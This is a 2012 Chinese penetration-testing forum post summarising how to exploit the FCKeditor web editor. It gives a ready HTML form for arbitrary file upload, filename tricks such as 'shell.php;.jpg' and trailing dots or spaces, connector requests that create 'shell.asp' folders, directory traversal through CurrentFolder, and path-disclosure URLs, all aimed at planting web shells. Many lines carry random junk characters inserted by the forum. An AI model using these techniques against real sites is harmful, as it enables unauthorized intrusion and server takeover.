中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本* }8 U6 N  y+ h( h6 g. T5 G* p
FCKeditor/_whatsnew.html; d8 O0 d) y3 G  q% {0 e. B
—————————————————————————————————————————————————————————————

2. Version 2.2 版本7 G, H2 m: V3 ^5 h1 \5 _1 ^  s5 u2 C
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
& b6 J3 T2 r0 [' l—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
) C9 v, X1 p9 T& u<form id="frmUpload" enctype="multipart/form-data"
+ ^2 k" Z9 C+ b& M, H' u* I2 Paction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
# V, ^$ s1 J- Q0 J<input type="file" name="NewFile" size="50"><br>
7 s9 N0 \, d- G<input id="btnUpload" type="submit" value="Upload">' [( k) o7 p. Z
</form>
* c7 P8 {; P2 z3 \  e& |' _0 _; D—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法* Y# ]' j( \( ?5 o( k% C5 q
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。' u  P/ i$ _  G* `% w0 [1 @1 {
    4.1:提交shell.php+空格绕过
7 D7 P% f; i9 P2 H/ W; e不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。8 w/ O+ J& S; c! ]9 X
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。8 U: X) Q3 G/ D: R! z
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
% ?, L- ?( r7 V4 p# t3 wFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
# X6 `6 q+ r& EFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp8 O, W, f3 y2 q' D
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址$ W0 H4 T7 ?8 ^0 N9 q3 u2 y
FCKeditor/editor/filemanager/browser/default/connectors/test.html
0 @1 _) j6 N+ U# n" ~3 A/ m0 yFCKeditor/editor/filemanager/upload/test.html
* H3 X3 C0 ^4 W8 i9 B; s! gFCKeditor/editor/filemanager/connectors/test.html0 b$ i" n: q" T" m' S$ ^* t9 E
FCKeditor/editor/filemanager/connectors/uploadtest.html
  G0 T  T& g, g) A—————————————————————————————————————————————————————————————  q) Y- O1 k7 {* Y; \3 I  d9 Y

7.常用上传地址
! J/ S: L' ?9 P4 }2 M$ VFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
9 T( W' n- b& I/ p* P7 AFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp9 v) O7 |0 N3 F" A: ?
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过). R, j- I6 I3 Q
JSP 版:, ]0 ?- r/ E5 e+ r
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
5 P9 P5 |; s5 C" X( h) Z注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
/ L7 G5 g0 g5 }1 |8 s7 R件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
( [) L, }6 G( W8 }" G& U, c—————————————————————————————————————————————————————————————

8.其他上传地址' w5 _# u$ e* O1 i- \0 e1 I+ d
FCKeditor/_samples/default.html
8 c0 K9 o1 X$ MFCKeditor/_samples/asp/sample01.asp7 O  G# l- D7 r
FCKeditor/_samples/asp/sample02.asp
; N. E( A% H' D  Y% RFCKeditor/_samples/asp/sample03.asp* ^2 K6 N' G, g2 L( U) W
FCKeditor/_samples/asp/sample04.asp8 ~, E- F) N# I1 u9 r2 @3 W6 l. m
一般很多站点都已删除_samples 目录,可以试试。
) ^9 H" g1 s: RFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。2 g3 `- R  ^+ Z  n: ]0 r: T
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
% g8 u/ k+ C0 I# W* @$ M/ u9 uVersion 2.4.1 测试通过
& I2 ?3 r' j7 k9 z9 h2 g8 W修改CurrentFolder 参数使用 ../../来进入不同的目录
3 [8 {  }0 c4 V7 Z  ~6 U/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
+ ~: w+ t1 H! b: \& L5 O9 U! O根据返回的XML 信息可以查看网站所有的目录。
! A0 {6 }, H' U6 uFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 F9 V: O+ D$ f6 Y6 x, ^& U也可以直接浏览盘符:% M$ o/ e- p+ I( i
JSP 版本:5 h% x0 C& L' D, |
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
; |/ A. i! d& _: }—————————————————————————————————————————————————————————————

10.爆路径漏洞
7 _2 e) ]& A6 z7 e% ^+ S. Y: @FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp) L2 `% W/ |4 m7 g: a8 z1 @. c
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
$ M$ l* k6 S  h9 M  L8 N        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
  C/ y$ ?6 s. M脆弱描述:
. M1 m7 m/ R$ i! `FCKeditor v2.4.3 中File 类别默认拒绝上传类型:3 _% {3 g$ K/ S( z: H  c
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
7 k0 C1 s! \9 F3 M' c8 J0 Y' }  LFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!- R% j0 D$ Q% `3 k
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。% V4 a! m, ^: Q/ Y" G3 \& i" ?
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2